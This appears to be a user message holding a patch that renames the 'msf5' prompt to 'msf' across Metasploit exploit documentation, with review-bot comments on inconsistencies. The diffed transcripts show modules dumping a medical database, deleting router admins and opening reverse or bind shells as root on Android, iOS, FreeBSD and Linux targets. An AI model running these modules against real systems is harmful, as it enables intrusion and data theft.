user ``` -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action REMOVE_ADMIN +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action REMOVE_ADMIN action => REMOVE_USER -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Username red0xff +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Username red0xff Admin_Username => red0xff -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run [*] Running module against 192.168.1.223 [+] Target seems vulnerable diff --git a/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md b/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md index aad2adffc6..29cd5cfa1d 100644 --- a/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md +++ b/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md @@ -13,7 +13,7 @@ OpenEMR 5.0.1 (3). ## Options ``` -msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > show options +msf auxiliary(sqli/openemr/openemr_sqli_dump) > show options Module options (auxiliary/sqli/openemr/openemr_sqli_dump): @@ -32,14 +32,14 @@ Module options (auxiliary/sqli/openemr/openemr_sqli_dump): This module has both `check` and `run` functions. ``` -msf5 > use auxiliary/sqli/openemr/openemr_sqli_dump -msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > set rhosts 127.0.0.1 +msf > use auxiliary/sqli/openemr/openemr_sqli_dump +msf auxiliary(sqli/openemr/openemr_sqli_dump) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > check +msf auxiliary(sqli/openemr/openemr_sqli_dump) > check [*] Trying to detect installed version [*] 127.0.0.1:80 - The target appears to be vulnerable. -msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > run +msf auxiliary(sqli/openemr/openemr_sqli_dump) > run [*] Running module against 127.0.0.1 [*] DB Version: 10.3.15-MariaDB-1 
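Review bot: in dlink_central_wifimanager_sqli.md, under "Deleting an administrator user", the command `set action REMOVE_ADMIN` is followed by the echo `action => REMOVE_USER`. Elsewhere in the same file `set action ADD_ADMIN` echoes `action => ADD_ADMIN`, so this transcript was edited by hand and one of the two names is wrong. The patch already rewrites the command line directly above the echo, so correct the pair here to whichever action name the module defines. A reader copying the block should then see the same output.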
@@ -61,7 +61,7 @@ msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > run [*] Dumping table (310/310): geo_country_reference [*] Dumped all tables to /root/.msf4/loot [*] Auxiliary module execution completed -msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > exit +msf auxiliary(sqli/openemr/openemr_sqli_dump) > exit root@localhost:/# cd /root/.msf4/loot root@localhost:~/.msf4/loot# ls -l diff --git a/documentation/modules/exploit/aix/local/xorg_x11_server.md b/documentation/modules/exploit/aix/local/xorg_x11_server.md index cead3a34a9..a3cc00fc1e 100644 --- a/documentation/modules/exploit/aix/local/xorg_x11_server.md +++ b/documentation/modules/exploit/aix/local/xorg_x11_server.md @@ -46,11 +46,11 @@ A writable directory file system path. (default: `/tmp`) https://vimeo.com/372193921 ``` -msf5 exploit(aix/local/xorg_x11_server) > set session 1 +msf exploit(aix/local/xorg_x11_server) > set session 1 session => 1 -msf5 exploit(aix/local/xorg_x11_server) > set writabledir /tmp +msf exploit(aix/local/xorg_x11_server) > set writabledir /tmp writabledir => /tmp -msf5 exploit(aix/local/xorg_x11_server) > run +msf exploit(aix/local/xorg_x11_server) > run [*] Started reverse TCP handler on 0.0.0.0:8888 [*] Xorg version is 7.2.3.0 diff --git a/documentation/modules/exploit/android/local/binder_uaf.md b/documentation/modules/exploit/android/local/binder_uaf.md index d767f32ebc..bd787fd826 100644 --- a/documentation/modules/exploit/android/local/binder_uaf.md +++ b/documentation/modules/exploit/android/local/binder_uaf.md 
@@ -24,13 +24,13 @@ Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 201 - Run the exploit: ``` -msf5 exploit(multi/handler) > use exploit/android/local/binder_uaf -msf5 exploit(android/local/binder_uaf) > set LHOST IPADDR -msf5 exploit(android/local/binder_uaf) > set LPORT 4448 (different from your Android meterpreter port) +msf exploit(multi/handler) > use exploit/android/local/binder_uaf +msf exploit(android/local/binder_uaf) > set LHOST IPADDR +msf exploit(android/local/binder_uaf) > set LPORT 4448 (different from your Android meterpreter port) LPORT => 4448 -msf5 exploit(android/local/binder_uaf) > set SESSION -1 +msf exploit(android/local/binder_uaf) > set SESSION -1 SESSION => -1 -msf5 exploit(android/local/binder_uaf) > run +msf exploit(android/local/binder_uaf) > run ``` - **Verify** the new session can read and write private application data (in /data/data/..../) diff --git a/documentation/modules/exploit/android/local/futex_requeue.md b/documentation/modules/exploit/android/local/futex_requeue.md index ee2f666b94..6a01a7d2f1 100644 --- a/documentation/modules/exploit/android/local/futex_requeue.md +++ b/documentation/modules/exploit/android/local/futex_requeue.md 
@@ -70,18 +70,18 @@ meterpreter > getuid Server username: u0_a191 meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use exploit/android/local/futex_requeue -msf5 exploit(android/local/futex_requeue) > set session 1 +msf exploit(multi/handler) > use exploit/android/local/futex_requeue +msf exploit(android/local/futex_requeue) > set session 1 session => 1 -msf5 exploit(android/local/futex_requeue) > set verbose true +msf exploit(android/local/futex_requeue) > set verbose true verbose => true -msf5 exploit(android/local/futex_requeue) > set lhost 111.111.1.111 +msf exploit(android/local/futex_requeue) > set lhost 111.111.1.111 lhost => 111.111.1.111 -msf5 exploit(android/local/futex_requeue) > check +msf exploit(android/local/futex_requeue) > check [+] Android version 4.4.2 appears to be vulnerable [*] The target appears to be vulnerable. -msf5 exploit(android/local/futex_requeue) > run +msf exploit(android/local/futex_requeue) > run [*] Started reverse TCP handler on 111.111.1.111:4444 [+] Android version 4.4.2 appears to be vulnerable diff --git a/documentation/modules/exploit/android/local/janus.md b/documentation/modules/exploit/android/local/janus.md index 5dad905158..1c563940ba 100644 --- a/documentation/modules/exploit/android/local/janus.md +++ b/documentation/modules/exploit/android/local/janus.md @@ -92,7 +92,7 @@ Install [com.phonegap.camerasample](https://github.com/heavysixer/phonegap-camer An `exploit/multi/handler` was started prior to exploitation. ``` -msf5 exploit(multi/handler) > sessions +msf exploit(multi/handler) > sessions Active sessions =============== 
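Review bot: in binder_uaf.md, the rewritten line `set LPORT 4448 (different from your Android meterpreter port)` still carries an explanatory remark inside the console command, where it reads as part of what the user types. Move the remark into the "Run the exploit:" list item above the fence and leave the command as `set LPORT 4448`. In the same block, `set LHOST IPADDR` is the only `set` without its `=>` echo line, and `IPADDR` is not marked as a placeholder. Either add the echo or write the placeholder the way the Centreon doc in this patch does with `[IP]`.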
@@ -101,16 +101,16 @@ Active sessions -- ---- ---- ----------- ---------- 1 meterpreter dalvik/android u0_a80 @ localhost 192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107) -msf5 exploit(multi/handler) > use exploit/android/local/janus -msf5 exploit(android/local/janus) > set PACKAGE com.phonegap.camerasample +msf exploit(multi/handler) > use exploit/android/local/janus +msf exploit(android/local/janus) > set PACKAGE com.phonegap.camerasample PACKAGE => com.phonegap.camerasample -msf5 exploit(android/local/janus) > set SESSION 1 +msf exploit(android/local/janus) > set SESSION 1 SESSION => 1 -msf5 exploit(android/local/janus) > set LHOST 192.168.0.176 +msf exploit(android/local/janus) > set LHOST 192.168.0.176 LHOST => 192.168.0.176 -msf5 exploit(android/local/janus) > set LPORT 4445 +msf exploit(android/local/janus) > set LPORT 4445 LPORT => 4445 -msf5 exploit(android/local/janus) > run +msf exploit(android/local/janus) > run [*] Downloading APK: /data/app/com.phonegap.camerasample-1/base.apk [*] Decompiling original APK.. @@ -121,7 +121,7 @@ msf5 exploit(android/local/janus) > run [*] Rebuilding apk with meterpreter injection as /tmp/d20190824-7164-qydvgj/output.apk [*] Uploading APK: /sdcard/app.apk [*] APK uploaded -msf5 exploit(android/local/janus) > +msf exploit(android/local/janus) > ``` Please note that the user will need to manually accept the install prompt on the device (and also open the application) before a new session is opened. @@ -129,7 +129,7 @@ Please note that the user will need to manually accept the install prompt on the [*] Sending stage (72609 bytes) to 192.168.0.107 [*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800 -msf5 exploit(android/local/janus) > sessions 2 +msf exploit(android/local/janus) > sessions 2 [*] Starting interaction with 2... meterpreter > pwd 
@@ -221,7 +221,7 @@ resource (janus.rb)> run [*] Uploading APK: /sdcard/app.apk [*] APK uploaded [*] User should now have a prompt to install an updated version of the app -msf5 exploit(android/local/janus) > +msf exploit(android/local/janus) > ``` Install the app on the phone. For this app, clicking Open was not required, the shell was immediate. @@ -238,7 +238,7 @@ WARNING: Local file /root/metasploit-framework/data/android/meterpreter.jar is b [*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:38676) at 2019-11-05 20:12:38 -0500 [-] Unknown command: (installing. -msf5 exploit(android/local/janus) > sessions -i 2 +msf exploit(android/local/janus) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid diff --git a/documentation/modules/exploit/android/local/su_exec.md b/documentation/modules/exploit/android/local/su_exec.md index d5024acaf0..48b2730873 100644 --- a/documentation/modules/exploit/android/local/su_exec.md +++ b/documentation/modules/exploit/android/local/su_exec.md @@ -19,7 +19,7 @@ Once the module is loaded, one simply needs to set the `SESSION` option and conf An example session follows: ``` -msf5 exploit(multi/handler) > sessions +msf exploit(multi/handler) > sessions Active sessions =============== 
@@ -28,16 +28,16 @@ Active sessions -- ---- ---- ----------- ---------- 1 meterpreter dalvik/android u0_a80 @ localhost 192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107) -msf5 exploit(multi/handler) > use exploit/android/local/su_exec -msf5 exploit(android/local/su_exec) > set SESSION 1 +msf exploit(multi/handler) > use exploit/android/local/su_exec +msf exploit(android/local/su_exec) > set SESSION 1 SESSION => 1 -msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp +msf exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp payload => linux/aarch64/meterpreter/reverse_tcp -msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176 +msf exploit(android/local/su_exec) > set LHOST 192.168.0.176 LHOST => 192.168.0.176 -msf5 exploit(android/local/su_exec) > set LPORT 4445 +msf exploit(android/local/su_exec) > set LPORT 4445 LPORT => 4445 -msf5 exploit(android/local/su_exec) > run +msf exploit(android/local/su_exec) > run [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 192.168.0.176:4445 diff --git a/documentation/modules/exploit/apple_ios/browser/safari_jit.md b/documentation/modules/exploit/apple_ios/browser/safari_jit.md index 25efcbaebf..fae910b475 100644 --- a/documentation/modules/exploit/apple_ios/browser/safari_jit.md +++ b/documentation/modules/exploit/apple_ios/browser/safari_jit.md 
@@ -31,18 +31,18 @@ loading of the payload. Defaults to `false` ### iPhone 4 with iOS 7.1.2 ``` -msf5 > use exploit/apple_ios/browser/safari_jit +msf > use exploit/apple_ios/browser/safari_jit [*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp -msf5 exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1 +msf exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1 lhost => 1.1.1.1 -msf5 exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1 +msf exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1 srvhost => 1.1.1.1 -msf5 exploit(apple_ios/browser/safari_jit) > set verbose true +msf exploit(apple_ios/browser/safari_jit) > set verbose true verbose => true -msf5 exploit(apple_ios/browser/safari_jit) > run +msf exploit(apple_ios/browser/safari_jit) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. -msf5 exploit(apple_ios/browser/safari_jit) > +msf exploit(apple_ios/browser/safari_jit) > [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Using URL: http://1.1.1.1:8080/ [*] Server started. diff --git a/documentation/modules/exploit/apple_ios/browser/webkit_createthis.md b/documentation/modules/exploit/apple_ios/browser/webkit_createthis.md index 5a467cdacc..c6a1cb600d 100644 --- a/documentation/modules/exploit/apple_ios/browser/webkit_createthis.md +++ b/documentation/modules/exploit/apple_ios/browser/webkit_createthis.md @@ -25,7 +25,7 @@ The exploit should work all 64-bit devices (iPhone 5S and newer) running iOS 10 ### 64bit iPhone 5S running iOS 10.2.1 ``` -msf5 exploit(apple_ios/browser/webkit_createthis) > exploit +msf exploit(apple_ios/browser/webkit_createthis) > exploit [*] Started reverse TCP handler on 192.168.1.51:4444 [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.1.51:8080/ 
@@ -36,7 +36,7 @@ msf5 exploit(apple_ios/browser/webkit_createthis) > exploit [+] 192.168.1.34 webkit_createthis - Sent sha1 iOS 10 payload [*] Meterpreter session 1 opened (192.168.1.51:4444 -> 192.168.1.34:49211) at 2019-04-15 11:34:01 +0200 -msf5 exploit(apple_ios/browser/webkit_createthis) > sessions +msf exploit(apple_ios/browser/webkit_createthis) > sessions Active sessions =============== @@ -45,7 +45,7 @@ Active sessions -- ---- ---- ----------- ---------- 1 meterpreter aarch64/apple_ios uid=0, gid=0, euid=0, egid=0 @ 192.168.1.34 192.168.1.51:4444 -> 192.168.1.34:49211 (192.168.1.34) -msf5 exploit(apple_ios/browser/webkit_createthis) > sessions 1 +msf exploit(apple_ios/browser/webkit_createthis) > sessions 1 [*] Starting interaction with 1... meterpreter > pwd diff --git a/documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md b/documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md index 896642f1a1..4f0eafc3ee 100644 --- a/documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md +++ b/documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md @@ -44,8 +44,8 @@ Set this to a BSD VAX payload. Currently, only ### `fingerd` 5.1 on 4.3BSD ``` -msf5 > use exploit/bsd/finger/morris_fingerd_bof -msf5 exploit(bsd/finger/morris_fingerd_bof) > options +msf > use exploit/bsd/finger/morris_fingerd_bof +msf exploit(bsd/finger/morris_fingerd_bof) > options Module options (exploit/bsd/finger/morris_fingerd_bof): 
@@ -70,11 +70,11 @@ Exploit target: 0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85 -msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1 +msf exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1 +msf exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf5 exploit(bsd/finger/morris_fingerd_bof) > run +msf exploit(bsd/finger/morris_fingerd_bof) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] 127.0.0.1:79 - Connecting to fingerd diff --git a/documentation/modules/exploit/freebsd/http/citrix_dir_traversal_rce.md b/documentation/modules/exploit/freebsd/http/citrix_dir_traversal_rce.md index 87c5f4bde7..c8eff6bd52 100644 --- a/documentation/modules/exploit/freebsd/http/citrix_dir_traversal_rce.md +++ b/documentation/modules/exploit/freebsd/http/citrix_dir_traversal_rce.md @@ -9,7 +9,7 @@ This `/vpns/` directory is interesting because it contains Perl code. The script A malicious attacker can execute arbitrary commands remotely by creating a corrupted XML file that uses the Perl Template Toolkit in part of payload. ``` -msf5 exploit(freebsd/http/citrix_dir_traversal_rce) > run +msf exploit(freebsd/http/citrix_dir_traversal_rce) > run [*] Using auxiliary/scanner/http/citrix_dir_traversal as check [+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781. 
@@ -23,9 +23,9 @@ uid=65534(nobody) gid=65534(nobody) groups=65534(nobody) [!] This exploit may require manual cleanup of '/netscaler/portal/templates/mdjLHiHtIYmh.xml' on the target [!] This exploit may require manual cleanup of '/var/tmp/netscaler/portal/templates/mdjLHiHtIYmh.xml.ttc2' on the target [*] Exploit completed, but no session was created. -msf5 exploit(freebsd/http/citrix_dir_traversal_rce) > set payload cmd/unix/bind_perl +msf exploit(freebsd/http/citrix_dir_traversal_rce) > set payload cmd/unix/bind_perl payload => cmd/unix/bind_perl -msf5 exploit(freebsd/http/citrix_dir_traversal_rce) > run +msf exploit(freebsd/http/citrix_dir_traversal_rce) > run [*] Using auxiliary/scanner/http/citrix_dir_traversal as check [+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781. diff --git a/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md b/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md index d0086291b7..eebb7e1f0e 100644 --- a/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md +++ b/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md @@ -48,12 +48,12 @@ ### FreeBSD 9.0-RELEASE ``` - msf5 > use exploit/freebsd/local/intel_sysret_priv_esc - msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set session 1 + msf > use exploit/freebsd/local/intel_sysret_priv_esc + msf exploit(freebsd/local/intel_sysret_priv_esc) > set session 1 session => 1 - msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set lhost 123.123.123.188 + msf exploit(freebsd/local/intel_sysret_priv_esc) > set lhost 123.123.123.188 lhost => 123.123.123.188 - msf5 exploit(freebsd/local/intel_sysret_priv_esc) > run + msf exploit(freebsd/local/intel_sysret_priv_esc) > run [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 123.123.123.188:4444 
diff --git a/documentation/modules/exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc.md b/documentation/modules/exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc.md index c873ea9f2e..2f2a78e474 100644 --- a/documentation/modules/exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc.md +++ b/documentation/modules/exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc.md @@ -53,13 +53,13 @@ A directory where we can write files (default: `/tmp`) ### FreeBSD 9.3-RELEASE #0 r268512 (amd64) ``` -msf5 > use exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc +msf > use exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc [*] Using configured payload bsd/x64/shell_reverse_tcp -msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set lhost 172.16.191.165 +msf exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 -msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set session 1 +msf exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set session 1 session => 1 -msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > run +msf exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > run [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 172.16.191.165:4444 
@@ -86,13 +86,13 @@ FreeBSD freebsd-9-3-amd64 9.3-RELEASE FreeBSD 9.3-RELEASE #0 r268512: Thu Jul 10 ### FreeBSD 12.1-RELEASE r354233 (amd64) ``` -msf5 > use exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc +msf > use exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc [*] Using configured payload bsd/x64/shell_reverse_tcp -msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set lhost 172.16.191.165 +msf exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 -msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set session 1 +msf exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > set session 1 session => 1 -msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > run +msf exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > run [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 172.16.191.165:4444 diff --git a/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md b/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md index 68bff52d99..1acc4eba10 100644 --- a/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md +++ b/documentation/modules/exploit/freebsd/local/rtld_execl_priv_esc.md 
@@ -41,14 +41,14 @@ ### FreeBSD 7.2-RELEASE (amd64) ``` - msf5 > use exploit/freebsd/local/rtld_execl_priv_esc - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set session 1 + msf > use exploit/freebsd/local/rtld_execl_priv_esc + msf exploit(freebsd/local/rtld_execl_priv_esc) > set session 1 session => 1 - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true + msf exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true verbose => true - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165 + msf exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > run + msf exploit(freebsd/local/rtld_execl_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] FreeBSD version 7.2-RELEASE appears vulnerable @@ -95,14 +95,14 @@ ### FreeBSD 8.0-RELEASE (amd64) ``` - msf5 > use exploit/freebsd/local/rtld_execl_priv_esc - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set session 1 + msf > use exploit/freebsd/local/rtld_execl_priv_esc + msf exploit(freebsd/local/rtld_execl_priv_esc) > set session 1 session => 1 - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true + msf exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true verbose => true - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165 + msf exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(freebsd/local/rtld_execl_priv_esc) > run + msf exploit(freebsd/local/rtld_execl_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] FreeBSD version 8.0-RELEASE appears vulnerable diff --git a/documentation/modules/exploit/linux/http/apache_couchdb_cmd_exec.md b/documentation/modules/exploit/linux/http/apache_couchdb_cmd_exec.md index a1cfff7a63..880412a51c 100644 --- a/documentation/modules/exploit/linux/http/apache_couchdb_cmd_exec.md 
+++ b/documentation/modules/exploit/linux/http/apache_couchdb_cmd_exec.md @@ -52,8 +52,8 @@ Sometimes it requires authentication, set these options to authorize. ### Apache CouchDB on Linux ``` -msf5 > use modules/exploits/linux/http/apache_couchdb_cmd_exec.rb -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > show options +msf > use modules/exploits/linux/http/apache_couchdb_cmd_exec.rb +msf exploit(linux/http/apache_couchdb_cmd_exec) > show options Module options (exploit/linux/http/apache_couchdb_cmd_exec): 
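Review bot: in apache_couchdb_cmd_exec.md, the new line `msf > use modules/exploits/linux/http/apache_couchdb_cmd_exec.rb` loads the module by its source-tree file path, while the prompt and the "Module options (exploit/linux/http/apache_couchdb_cmd_exec):" line right after it show the module name. The other scenario blocks touched by this patch use the `use exploit/...` form. Since this line is being rewritten anyway, change it to `use exploit/linux/http/apache_couchdb_cmd_exec` so the docs show one consistent way to select a module.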
@@ -87,25 +87,25 @@ Exploit target: 0 Automatic -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set rhost 192.168.77.139 +msf exploit(linux/http/apache_couchdb_cmd_exec) > set rhost 192.168.77.139 rhost => 192.168.77.139 -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > check +msf exploit(linux/http/apache_couchdb_cmd_exec) > check [*] 192.168.77.139:5984 The target appears to be vulnerable. -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set srvhost 192.168.77.139 +msf exploit(linux/http/apache_couchdb_cmd_exec) > set srvhost 192.168.77.139 srvhost => 192.168.77.139 -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set srvport 8888 +msf exploit(linux/http/apache_couchdb_cmd_exec) > set srvport 8888 srvport => 8888 -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set lhost 192.168.77.139 +msf exploit(linux/http/apache_couchdb_cmd_exec) > set lhost 192.168.77.139 lhost => 192.168.77.139 -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > exploit +msf exploit(linux/http/apache_couchdb_cmd_exec) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.77.139:4444 -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > [*] Using URL: http://192.168.77.139:8888/rXrdf2 +msf exploit(linux/http/apache_couchdb_cmd_exec) > [*] Using URL: http://192.168.77.139:8888/rXrdf2 [*] 192.168.77.139:5984 - The 1 time to exploit [*] 192.168.77.139:5984 - Sending the payload to the server... [*] Command shell session 1 opened (192.168.77.139:4444 -> 172.18.0.2:58348) at 2018-03-27 06:18:21 -0400 [*] Server stopped. -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 1 +msf exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 1 [*] Starting interaction with 1... id uid=1000(couchdb) gid=999(couchdb) groups=999(couchdb) 
diff --git a/documentation/modules/exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.md b/documentation/modules/exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.md index 105e2c414a..3f5839986d 100644 --- a/documentation/modules/exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.md +++ b/documentation/modules/exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.md @@ -33,7 +33,7 @@ If not set, the module will attempt to bypass authentication using the authentic #### Using a dropper / getting a native meterpreter shell (TARGET being Linux Dropper) ``` -msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit +msf exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit [*] Started reverse TCP handler on 192.168.1.222:4444 [*] Attempting to bypass authentication via CVE-2020-17506 (SQL injection) @@ -63,8 +63,8 @@ uid=0(root) gid=0(root) groups=0(root) #### Cmd payload : `cmd/unix/reverse_perl` ``` -msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > -msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit +msf exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > +msf exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit [*] Started reverse TCP handler on 192.168.1.222:4444 [*] Attempting to bypass authentication via CVE-2020-17506 (SQL injection) diff --git a/documentation/modules/exploit/linux/http/bludit_upload_images_exec.md b/documentation/modules/exploit/linux/http/bludit_upload_images_exec.md index 495470e293..1f2ed41efa 100644 --- a/documentation/modules/exploit/linux/http/bludit_upload_images_exec.md +++ b/documentation/modules/exploit/linux/http/bludit_upload_images_exec.md 
@@ -13,9 +13,9 @@ This module exploits a vulnerability in Bludit: A simple, fast, "secure", flat-f ## Scenarios ``` -msf5 exploit(linux/http/bludit_upload_images_exec) > check +msf exploit(linux/http/bludit_upload_images_exec) > check [*] 172.16.135.162:80 - The service is running, but could not be validated. -msf5 exploit(linux/http/bludit_upload_images_exec) > run +msf exploit(linux/http/bludit_upload_images_exec) > run [*] Started reverse TCP handler on 172.16.135.1:4444 [+] Logged in as: admin diff --git a/documentation/modules/exploit/linux/http/centreon_pollers_auth_rce.md b/documentation/modules/exploit/linux/http/centreon_pollers_auth_rce.md index b4366be6e8..2933153fde 100644 --- a/documentation/modules/exploit/linux/http/centreon_pollers_auth_rce.md +++ b/documentation/modules/exploit/linux/http/centreon_pollers_auth_rce.md 
@@ -28,18 +28,18 @@ Tested on: ## Scenarios ``` -msf5 > use exploit/linux/http/centreon_pollers_auth_rce -msf5 exploit(linux/http/centreon_pollers_auth_rce) > set rhosts [IP] +msf > use exploit/linux/http/centreon_pollers_auth_rce +msf exploit(linux/http/centreon_pollers_auth_rce) > set rhosts [IP] rhosts => [IP] -msf5 exploit(linux/http/centreon_pollers_auth_rce) > set username admin +msf exploit(linux/http/centreon_pollers_auth_rce) > set username admin username => admin -msf5 exploit(linux/http/centreon_pollers_auth_rce) > set password centreon +msf exploit(linux/http/centreon_pollers_auth_rce) > set password centreon password => centreon -msf5 exploit(linux/http/centreon_pollers_auth_rce) > set lhost [IP] +msf exploit(linux/http/centreon_pollers_auth_rce) > set lhost [IP] lhost => [IP] -msf5 exploit(linux/http/centreon_pollers_auth_rce) > set verbose true +msf exploit(linux/http/centreon_pollers_auth_rce) > set verbose true verbose => true -msf5 exploit(linux/http/centreon_pollers_auth_rce) > run +msf exploit(linux/http/centreon_pollers_auth_rce) > run [*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444 [*] Send authentication request. @@ -57,9 +57,9 @@ uid=48(apache) gid=48(apache) groups=48(apache),993(centreon-engine),994(centreo --or-- -msf5 exploit(linux/http/centreon_pollers_auth_rce) > set target 1 +msf exploit(linux/http/centreon_pollers_auth_rce) > set target 1 target => 1 -msf5 exploit(linux/http/centreon_pollers_auth_rce) > run +msf exploit(linux/http/centreon_pollers_auth_rce) > run [*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444 [*] Send authentication request. diff --git a/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md b/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md index 8ba14226ef..37d95b29bb 100644 --- a/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md +++ b/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md 